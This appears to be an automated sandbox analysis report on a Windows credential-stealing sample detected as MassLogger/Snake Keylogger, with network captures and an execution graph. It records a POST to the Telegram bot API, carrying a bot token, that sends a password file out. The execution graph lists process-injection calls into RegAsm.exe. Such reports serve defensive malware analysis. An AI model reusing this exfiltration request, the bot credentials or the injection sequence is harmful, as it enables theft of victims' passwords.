                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1614&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1794714&cwnd=228&unsent_bytes=0&cid=06eab7896491c63e&ts=284&x=0"
                                                                                      2025-01-10 22:44:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549711149.154.167.2204432276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-10 22:44:39 UTC296OUTPOST /bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendDocument?chat_id=6790572687&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary================8dd319e7496d93b
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 1088
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-10 22:44:39 UTC1088OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 65 37 34 39 36 64 39 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                      Data Ascii: --===============8dd319e7496d93bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                      2025-01-10 22:44:40 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 10 Jan 2025 22:44:40 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 560
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2025-01-10 22:44:40 UTC560INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 30 38 37 39 31 35 34 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 32 30 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 61 6d 6d 79 73 75 6e 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 39 30 35 37 32 36 38 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 41 4d 55 45 4c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 55 4e 4e 59 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 49 47 5f 53 41 4d 4d 59 39 30 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 39 30 38 30 2c 22 64
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":165,"from":{"id":7808791546,"is_bot":true,"first_name":"NOVA2025","username":"sammysunbot"},"chat":{"id":6790572687,"first_name":"SAMUEL","last_name":"SUNNY","username":"BIG_SAMMY90","type":"private"},"date":1736549080,"d


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:17:44:30
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Users\user\Desktop\z87sammylastborn.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\z87sammylastborn.exe"
                                                                                      Imagebase:0x600000
                                                                                      File size:205'312 bytes
                                                                                      MD5 hash:A5211C64910B02B059F301B05DE54B16
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:17:44:31
                                                                                      Start date:10/01/2025
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                      Imagebase:0x6f0000
                                                                                      File size:65'440 bytes
                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:13.2%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:7%
                                                                                        Total number of Nodes:546
                                                                                        Total number of Limit Nodes:40
                                                                                        execution_graph 38657 cad788 DuplicateHandle 38658 cad81e 38657->38658 38848 4fa2018 SetWindowLongW 38849 4fa2084 38848->38849 38850 ca4668 38851 ca467a 38850->38851 38852 ca4686 38851->38852 38859 ca4778 38851->38859 38864 ca3e1c 38852->38864 38854 ca46a5 38868 5074140 38854->38868 38872 5074130 38854->38872 38860 ca479d 38859->38860 38876 ca4888 38860->38876 38880 ca4878 38860->38880 38865 ca3e27 38864->38865 38888 ca5cec 38865->38888 38867 ca72f8 38867->38854 38869 5074152 38868->38869 38937 50717cc 38869->38937 38873 5074135 38872->38873 38874 50717cc 9 API calls 38873->38874 38875 ca46ae 38874->38875 38877 ca48af 38876->38877 38878 ca498c 38877->38878 38884 ca449c 38877->38884 38882 ca48af 38880->38882 38881 ca498c 38881->38881 38882->38881 38883 ca449c CreateActCtxA 38882->38883 38883->38881 38885 ca5918 CreateActCtxA 38884->38885 38887 ca59db 38885->38887 38889 ca5cf7 38888->38889 38892 ca5d0c 38889->38892 38891 ca739d 38891->38867 38893 ca5d17 38892->38893 38896 ca5d3c 38893->38896 38895 ca747a 38895->38891 38897 ca5d47 38896->38897 38900 ca5d6c 38897->38900 38899 ca756d 38899->38895 38902 ca5d77 38900->38902 38901 ca8b09 38901->38899 38902->38901 38904 cace60 38902->38904 38906 cace91 38904->38906 38905 caceb5 38905->38901 38906->38905 38908 cad428 38906->38908 38909 cad435 38908->38909 38910 cad46f 38909->38910 38912 cad230 38909->38912 38910->38905 38914 cad23b 38912->38914 38913 cadd80 38914->38913 38916 cad35c 38914->38916 38917 cad367 38916->38917 38918 ca5d6c 3 API calls 38917->38918 38919 caddef 38918->38919 38928 cae270 38919->38928 38920 caddfe 38921 cad36c PostMessageW 38920->38921 38922 cade18 38921->38922 38923 cad37c PostMessageW 38922->38923 38924 cade1f 38923->38924 38926 cafb80 CreateWindowExW 38924->38926 38925 cade29 38925->38913 38926->38925 38930 cae29e 38928->38930 38929 cae3db 38930->38929 38931 cae36f 38930->38931 38935 4fa4680 CreateWindowExW PostMessageW 38930->38935 38936 4fa4670 CreateWindowExW PostMessageW 38930->38936 38931->38929 38932 cad37c PostMessageW 38931->38932 38932->38929 38933 cae316 38934 cae36a KiUserCallbackDispatcher 38933->38934 38934->38931 38935->38933 38936->38933 38938 50717d7 38937->38938 38941 507180c 38938->38941 38940 5074284 38940->38940 38942 5071817 38941->38942 38946 507479e 38942->38946 38948 50749f7 38942->38948 38952 5074314 38942->38952 38943 5074314 3 API calls 38944 50748f9 38943->38944 38947 5074933 38944->38947 38957 6c51648 38944->38957 38962 6c51637 38944->38962 38946->38943 38946->38944 38947->38948 38967 507437c 38947->38967 38948->38940 38953 507431f 38952->38953 38974 5074b39 38953->38974 38980 5074b48 38953->38980 38954 5074b34 38954->38946 38958 6c516ad 38957->38958 38959 6c516fa 38958->38959 38989 6c51ed8 38958->38989 38996 6c51ee8 38958->38996 38959->38947 38964 6c51648 38962->38964 38963 6c516fa 38963->38947 38964->38963 38965 6c51ed8 4 API calls 38964->38965 38966 6c51ee8 4 API calls 38964->38966 38965->38963 38966->38963 38968 5074387 38967->38968 38969 507ed2b 38968->38969 38970 507ed38 GetCurrentThreadId 38968->38970 38973 507ed66 38968->38973 39021 507db54 PostThreadMessageW 38969->39021 38970->38973 38972 507ed33 38972->38973 38975 5074b6e 38974->38975 38978 5074b82 38975->38978 38979 cae270 3 API calls 38975->38979 38976 5074c6d 38976->38978 38986 5074444 38976->38986 38978->38954 38979->38976 38981 5074b6e 38980->38981 38984 5074b82 38981->38984 38985 cae270 3 API calls 38981->38985 38982 5074c6d 38983 5074444 PostMessageW 38982->38983 38982->38984 38983->38984 38984->38954 38985->38982 38987 50765a8 PostMessageW 38986->38987 38988 5076614 38987->38988 38988->38978 38990 6c51ee8 38989->38990 39003 6c51fc0 38990->39003 39009 6c51fd0 38990->39009 38991 6c51f3b 39015 6c510f8 GetCurrentThreadId 38991->39015 38993 6c51f4a 38993->38959 38997 6c51f07 38996->38997 39001 6c51fc0 2 API calls 38997->39001 39002 6c51fd0 2 API calls 38997->39002 38998 6c51f3b 39020 6c510f8 GetCurrentThreadId 38998->39020 39000 6c51f4a 39000->38959 39001->38998 39002->38998 39004 6c5201f GetCurrentThreadId 39003->39004 39006 6c52065 39004->39006 39016 6c5114c 39006->39016 39010 6c5201f GetCurrentThreadId 39009->39010 39012 6c52065 39010->39012 39013 6c5114c EnumThreadWindows 39012->39013 39014 6c520a0 39013->39014 39014->38991 39015->38993 39017 6c51153 EnumThreadWindows 39016->39017 39019 6c520a0 39017->39019 39019->38991 39020->39000 39021->38972 39022 507a6a0 39023 507a6d3 39022->39023 39051 507a30c 39023->39051 39055 507a318 39023->39055 39024 507a851 39025 507a973 39024->39025 39049 5079ef2 Wow64SetThreadContext 39024->39049 39050 5079ef8 Wow64SetThreadContext 39024->39050 39039 507a180 ReadProcessMemory 39025->39039 39040 507a178 ReadProcessMemory 39025->39040 39026 507aa9d 39037 5079fd0 VirtualAllocEx 39026->39037 39038 5079fca VirtualAllocEx 39026->39038 39027 507ac23 39041 507a090 WriteProcessMemory 39027->39041 39042 507a08a WriteProcessMemory 39027->39042 39028 507af31 39045 507a090 WriteProcessMemory 39028->39045 39046 507a08a WriteProcessMemory 39028->39046 39029 507af6f 39031 507b06d 39029->39031 39047 5079ef2 Wow64SetThreadContext 39029->39047 39048 5079ef8 Wow64SetThreadContext 39029->39048 39030 507ad05 39030->39028 39043 507a090 WriteProcessMemory 39030->39043 39044 507a08a WriteProcessMemory 39030->39044 39035 5079e42 ResumeThread 39031->39035 39036 5079e48 ResumeThread 39031->39036 39032 507b16a 39035->39032 39036->39032 39037->39027 39038->39027 39039->39026 39040->39026 39041->39030 39042->39030 39043->39030 39044->39030 39045->39029 39046->39029 39047->39031 39048->39031 39049->39025 39050->39025 39052 507a318 CreateProcessA 39051->39052 39054 507a563 39052->39054 39054->39054 39056 507a3a1 CreateProcessA 39055->39056 39058 507a563 39056->39058 38659 cad540 38660 cad586 GetCurrentProcess 38659->38660 38662 cad5d8 GetCurrentThread 38660->38662 38663 cad5d1 38660->38663 38664 cad60e 38662->38664 38665 cad615 GetCurrentProcess 38662->38665 38663->38662 38664->38665 38666 cad64b GetCurrentThreadId 38665->38666 38668 cad6a4 38666->38668 39059 6c50ca8 39060 6c50cc0 39059->39060 39061 6c50cd9 39060->39061 39064 6c50fd8 39060->39064 39069 6c50fca 39060->39069 39065 6c50fe3 39064->39065 39066 6c50ff3 39065->39066 39074 6c51430 OleInitialize 39065->39074 39076 6c51428 OleInitialize 39065->39076 39066->39061 39070 6c50fe3 39069->39070 39071 6c50ff3 39070->39071 39072 6c51430 OleInitialize 39070->39072 39073 6c51428 OleInitialize 39070->39073 39071->39061 39072->39071 39073->39071 39075 6c51494 39074->39075 39075->39066 39077 6c51494 39076->39077 39077->39066 39078 5077ba8 39079 5077bcf 39078->39079 39080 5077c30 39079->39080 39081 cad37c PostMessageW 39079->39081 39081->39080 39082 4fa4508 39083 4fa4518 39082->39083 39089 5075fc0 39083->39089 39095 5075fb0 39083->39095 39101 4fa5b38 39083->39101 39113 4fa5b48 39083->39113 39084 4fa4541 39090 5075ff5 39089->39090 39092 4fa5b48 2 API calls 39090->39092 39093 4fa5b38 2 API calls 39090->39093 39125 4fa5df4 39090->39125 39091 507604a 39091->39084 39092->39091 39093->39091 39096 5075fc0 39095->39096 39098 4fa5b48 2 API calls 39096->39098 39099 4fa5b38 2 API calls 39096->39099 39100 4fa5df4 2 API calls 39096->39100 39097 507604a 39097->39084 39098->39097 39099->39097 39100->39097 39106 4fa5b74 39101->39106 39103 4fa5dac 39104 4fa4680 2 API calls 39103->39104 39105 4fa5f54 39103->39105 39104->39105 39105->39084 39106->39103 39131 4fa5744 39106->39131 39107 4fa5c2d 39108 4fa4680 2 API calls 39107->39108 39111 4fa5cd5 39107->39111 39109 4fa5c9f 39108->39109 39110 4fa4680 2 API calls 39109->39110 39110->39111 39112 4fa4680 2 API calls 39111->39112 39112->39103 39118 4fa5b74 39113->39118 39114 4fa5744 2 API calls 39119 4fa5c2d 39114->39119 39115 4fa5dac 39116 4fa4680 2 API calls 39115->39116 39117 4fa5f54 39115->39117 39116->39117 39117->39084 39118->39114 39118->39115 39120 4fa4680 2 API calls 39119->39120 39122 4fa5cd5 39119->39122 39121 4fa5c9f 39120->39121 39123 4fa4680 2 API calls 39121->39123 39124 4fa4680 2 API calls 39122->39124 39123->39122 39124->39115 39126 4fa5dfd 39125->39126 39128 4fa5e1b 39125->39128 39127 4fa4680 2 API calls 39126->39127 39126->39128 39127->39128 39129 4fa4680 2 API calls 39128->39129 39130 4fa5f54 39128->39130 39129->39130 39130->39091 39133 4fa574f 39131->39133 39132 4fa4680 2 API calls 39136 4fa60a9 39132->39136 39134 4fa4680 2 API calls 39133->39134 39135 4fa60e7 39133->39135 39133->39136 39134->39136 39135->39107 39136->39132 39136->39135 39137 4fa1f88 39138 4fa1fae 39137->39138 39141 4fa120c 39138->39141 39142 4fa1217 39141->39142 39143 4fa2d59 39142->39143 39145 4fa2d49 39142->39145 39166 4fa1334 39143->39166 39150 4fa2f4c 39145->39150 39156 4fa2e70 39145->39156 39161 4fa2e80 39145->39161 39146 4fa2d57 39151 4fa2f0a 39150->39151 39152 4fa2f5a 39150->39152 39173 4fa2f38 39151->39173 39177 4fa2f30 39151->39177 39153 4fa2f20 39153->39146 39158 4fa2e80 39156->39158 39157 4fa2f20 39157->39146 39159 4fa2f38 2 API calls 39158->39159 39160 4fa2f30 2 API calls 39158->39160 39159->39157 39160->39157 39163 4fa2e94 39161->39163 39162 4fa2f20 39162->39146 39164 4fa2f38 2 API calls 39163->39164 39165 4fa2f30 2 API calls 39163->39165 39164->39162 39165->39162 39167 4fa133f 39166->39167 39168 4fa448c 39167->39168 39169 4fa43e2 39167->39169 39171 4fa120c CallWindowProcW 39168->39171 39170 4fa443a CallWindowProcW 39169->39170 39172 4fa43e9 39169->39172 39170->39172 39171->39172 39172->39146 39174 4fa2f49 39173->39174 39182 50755c7 39173->39182 39201 50755e8 39173->39201 39174->39153 39178 4fa2f38 39177->39178 39179 4fa2f49 39178->39179 39180 50755c7 2 API calls 39178->39180 39181 50755e8 2 API calls 39178->39181 39179->39153 39180->39179 39181->39179 39183 50755e8 39182->39183 39184 5075606 39183->39184 39186 5075648 39183->39186 39191 5075614 39183->39191 39185 507560b 39184->39185 39188 5075622 39184->39188 39187 5075832 39185->39187 39185->39191 39189 50758d4 39186->39189 39190 5075659 39186->39190 39186->39191 39220 50745e8 39187->39220 39188->39191 39194 5075880 39188->39194 39195 507589c 39188->39195 39198 507574e 39188->39198 39228 5074698 39189->39228 39190->39191 39190->39194 39190->39198 39191->39198 39232 5075ba8 39191->39232 39237 5075bb8 39191->39237 39242 5074638 CallWindowProcW CallWindowProcW 39194->39242 39224 5074658 39195->39224 39198->39174 39202 5075601 39201->39202 39212 5075614 39201->39212 39203 5075606 39202->39203 39204 5075648 39202->39204 39205 507560b 39203->39205 39208 5075622 39203->39208 39207 50758d4 39204->39207 39209 5075659 39204->39209 39204->39212 39206 5075832 39205->39206 39205->39212 39210 50745e8 2 API calls 39206->39210 39211 5074698 2 API calls 39207->39211 39208->39212 39213 5075880 39208->39213 39214 507589c 39208->39214 39217 507574e 39208->39217 39209->39212 39209->39213 39209->39217 39210->39217 39211->39217 39212->39217 39218 5075ba8 2 API calls 39212->39218 39219 5075bb8 2 API calls 39212->39219 39276 5074638 CallWindowProcW CallWindowProcW 39213->39276 39216 5074658 2 API calls 39214->39216 39216->39217 39217->39174 39218->39217 39219->39217 39221 50745f3 39220->39221 39222 5075bb8 2 API calls 39221->39222 39223 5075dce 39222->39223 39223->39198 39225 5074663 39224->39225 39226 5075bb8 2 API calls 39225->39226 39227 5077b94 39226->39227 39227->39198 39229 50746a3 39228->39229 39230 5075bb8 2 API calls 39229->39230 39231 5077541 39230->39231 39231->39198 39233 5075bc3 39232->39233 39234 5075bca 39232->39234 39233->39198 39243 5075bd8 39234->39243 39235 5075bd0 39235->39198 39238 5075bc3 39237->39238 39239 5075bca 39237->39239 39238->39198 39241 5075bd8 2 API calls 39239->39241 39240 5075bd0 39240->39198 39241->39240 39242->39198 39244 5075bf6 39243->39244 39246 5075c18 39243->39246 39245 5075c04 39244->39245 39249 4fa3759 39244->39249 39254 4fa3768 39244->39254 39245->39235 39246->39235 39251 4fa37b4 39249->39251 39250 4fa3a54 39250->39245 39251->39250 39259 5075c48 39251->39259 39264 5075c58 39251->39264 39256 4fa37b4 39254->39256 39255 4fa3a54 39255->39245 39256->39255 39257 5075c48 2 API calls 39256->39257 39258 5075c58 2 API calls 39256->39258 39257->39255 39258->39255 39260 5075c58 39259->39260 39261 5075cc1 39260->39261 39263 4fa1334 2 API calls 39260->39263 39269 4fa4390 39260->39269 39261->39250 39263->39261 39265 5075c9e 39264->39265 39266 5075cc1 39265->39266 39267 4fa4390 2 API calls 39265->39267 39268 4fa1334 2 API calls 39265->39268 39266->39250 39267->39266 39268->39266 39270 4fa43a0 39269->39270 39271 4fa448c 39270->39271 39272 4fa43e2 39270->39272 39274 4fa120c CallWindowProcW 39271->39274 39273 4fa443a CallWindowProcW 39272->39273 39275 4fa43e9 39272->39275 39273->39275 39274->39275 39275->39261 39276->39217 39277 4fa7748 39280 4fa70d4 39277->39280 39279 4fa775f 39281 4fa70df 39280->39281 39282 4fa7818 39281->39282 39286 4fa7838 39281->39286 39291 4fa7828 39281->39291 39282->39279 39283 4fa77e2 39283->39279 39288 4fa785f 39286->39288 39289 4fa7a7d 39288->39289 39296 4fa7c98 39288->39296 39289->39283 39292 4fa7838 39291->39292 39294 4fa7a7d 39292->39294 39295 4fa7c98 2 API calls 39292->39295 39293 4fa7ab3 39293->39283 39294->39283 39295->39293 39297 4fa7cd7 39296->39297 39298 4fa7d5e 39297->39298 39299 4fa4680 2 API calls 39297->39299 39299->39298 39300 6c52870 39301 6c529fb 39300->39301 39302 6c52896 39300->39302 39302->39301 39303 5074444 PostMessageW 39302->39303 39305 50765a0 PostMessageW 39302->39305 39303->39302 39306 5076614 39305->39306 39306->39302 39307 5072271 CloseHandle 39308 50722df 39307->39308 39309 5076070 39310 50760b2 39309->39310 39311 50760b8 SetWindowTextW 39309->39311 39310->39311 39312 50760e9 39311->39312 38669 4fa65a0 38670 4fa65b8 38669->38670 38675 4fa5934 38670->38675 38674 4fa667a 38676 4fa593f 38675->38676 38677 4fa8d1a 38676->38677 38682 4fa8d8b 38676->38682 38691 4fa7270 38677->38691 38680 4fa666f 38686 4fa5944 38680->38686 38681 4fa8d26 38695 4fa7290 38681->38695 38682->38681 38708 4fa4680 38682->38708 38684 4fa8ea1 38684->38681 38685 4fa4680 2 API calls 38684->38685 38685->38681 38687 4fa594f 38686->38687 38687->38674 38688 4fa93ad 38687->38688 38689 4fa730c 2 API calls 38687->38689 38688->38674 38690 4fa93f3 38689->38690 38690->38674 38694 4fa727b 38691->38694 38692 4fa912d 38692->38681 38693 4fa7290 2 API calls 38693->38692 38694->38692 38694->38693 38696 4fa729b 38695->38696 38697 4fa923d 38696->38697 38698 4fa9275 38696->38698 38706 4fa9318 38696->38706 38699 4fa4680 2 API calls 38697->38699 38700 4fa929a 38698->38700 38701 4fa92c6 38698->38701 38704 4fa9244 38699->38704 38702 4fa4680 2 API calls 38700->38702 38703 4fa4680 2 API calls 38701->38703 38702->38704 38703->38704 38704->38680 38704->38706 38713 4fa730c 38704->38713 38706->38680 38707 4fa93f3 38707->38680 38709 4fa4690 38708->38709 38710 4fa46cd 38709->38710 38717 5074ed8 38709->38717 38733 5074ee8 38709->38733 38710->38684 38714 4fa7317 38713->38714 38715 4fa4680 2 API calls 38714->38715 38716 4fa9558 38714->38716 38715->38716 38716->38707 38718 5074ee8 38717->38718 38719 5074fbf 38718->38719 38749 cafb80 38718->38749 38731 4fa730c 2 API calls 38719->38731 38755 4fa94e1 38719->38755 38759 4fa93f9 38719->38759 38720 5075035 38763 4fa915f 38720->38763 38767 4fa72a0 38720->38767 38721 507503d 38726 50751a8 38721->38726 38771 cae064 38721->38771 38722 50751bc 38775 4fa9148 38726->38775 38779 4fa9137 38726->38779 38731->38720 38734 5074f21 38733->38734 38735 5074fbf 38734->38735 38744 cafb80 CreateWindowExW 38734->38744 38741 4fa93f9 2 API calls 38735->38741 38742 4fa730c 2 API calls 38735->38742 38743 4fa94e1 2 API calls 38735->38743 38736 5075035 38745 4fa915f 2 API calls 38736->38745 38746 4fa72a0 2 API calls 38736->38746 38737 507503d 38747 50751a8 38737->38747 38748 cae064 PostMessageW 38737->38748 38738 50751bc 38739 4fa9148 2 API calls 38739->38738 38740 4fa9137 2 API calls 38740->38738 38741->38736 38742->38736 38743->38736 38744->38735 38745->38737 38746->38737 38747->38739 38747->38740 38748->38747 38751 cafbb1 38749->38751 38752 cafcb1 38749->38752 38750 cafbbd 38750->38719 38751->38750 38783 4fa0a9f 38751->38783 38788 4fa0ab0 38751->38788 38752->38719 38756 4fa94e6 38755->38756 38757 4fa9558 38756->38757 38758 4fa4680 2 API calls 38756->38758 38757->38720 38758->38757 38760 4fa9431 38759->38760 38761 4fa4680 2 API calls 38760->38761 38762 4fa9558 38760->38762 38761->38762 38762->38720 38764 4fa9170 38763->38764 38765 4fa4680 2 API calls 38764->38765 38766 4fa918c 38764->38766 38765->38766 38766->38721 38768 4fa72ab 38767->38768 38769 4fa4680 2 API calls 38768->38769 38770 4fa918c 38768->38770 38769->38770 38770->38721 38772 cae06f 38771->38772 38773 caf4d5 38772->38773 38797 cad37c 38772->38797 38773->38726 38776 4fa9155 38775->38776 38777 4fa72a0 2 API calls 38776->38777 38778 4fa915c 38777->38778 38778->38722 38780 4fa9155 38779->38780 38781 4fa72a0 2 API calls 38780->38781 38782 4fa915c 38781->38782 38782->38722 38784 4fa0a86 38783->38784 38785 4fa0aaa 38783->38785 38784->38752 38786 4fa0b8a 38785->38786 38792 4fa1d71 38785->38792 38789 4fa0adb 38788->38789 38790 4fa0b8a 38789->38790 38791 4fa1d71 CreateWindowExW 38789->38791 38791->38790 38795 4fa1e7e CreateWindowExW 38792->38795 38794 4fa1d76 38794->38786 38796 4fa1ef4 38795->38796 38798 cad387 38797->38798 38801 cae158 38798->38801 38800 caf9af 38800->38773 38804 cae163 38801->38804 38802 cafb58 38802->38800 38803 cafb21 38808 5077ce8 38803->38808 38813 5077cf8 38803->38813 38804->38802 38804->38803 38805 cae158 PostMessageW 38804->38805 38805->38804 38810 5077cf8 38808->38810 38809 5077d47 38809->38802 38810->38809 38818 5077fc2 38810->38818 38824 5077fc8 38810->38824 38815 5077d0a 38813->38815 38814 5077d47 38814->38802 38815->38814 38816 5077fc2 PostMessageW 38815->38816 38817 5077fc8 PostMessageW 38815->38817 38816->38814 38817->38814 38819 5077feb 38818->38819 38820 5078120 38819->38820 38830 507851e 38819->38830 38834 5078358 38819->38834 38838 5078348 38819->38838 38820->38809 38825 5077feb 38824->38825 38826 5078120 38825->38826 38827 507851e PostMessageW 38825->38827 38828 5078348 PostMessageW 38825->38828 38829 5078358 PostMessageW 38825->38829 38826->38809 38827->38826 38828->38826 38829->38826 38831 5078534 38830->38831 38842 507553c 38831->38842 38833 507853e 38833->38820 38835 5078385 38834->38835 38836 507553c PostMessageW 38835->38836 38837 5078491 38835->38837 38836->38837 38837->38820 38839 5078385 38838->38839 38840 507553c PostMessageW 38839->38840 38841 5078491 38839->38841 38840->38841 38841->38820 38843 5075547 38842->38843 38845 507b295 38843->38845 38846 5076560 PostMessageW 38843->38846 38847 5076570 PostMessageW 38843->38847 38844 507b291 38844->38833 38845->38833 38846->38844 38847->38844 39313 cab1b0 39314 cab1bf 39313->39314 39316 cab298 39313->39316 39317 cab2dc 39316->39317 39318 cab2b9 39316->39318 39317->39314 39318->39317 39319 cab4e0 GetModuleHandleW 39318->39319 39320 cab50d 39319->39320 39320->39314

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
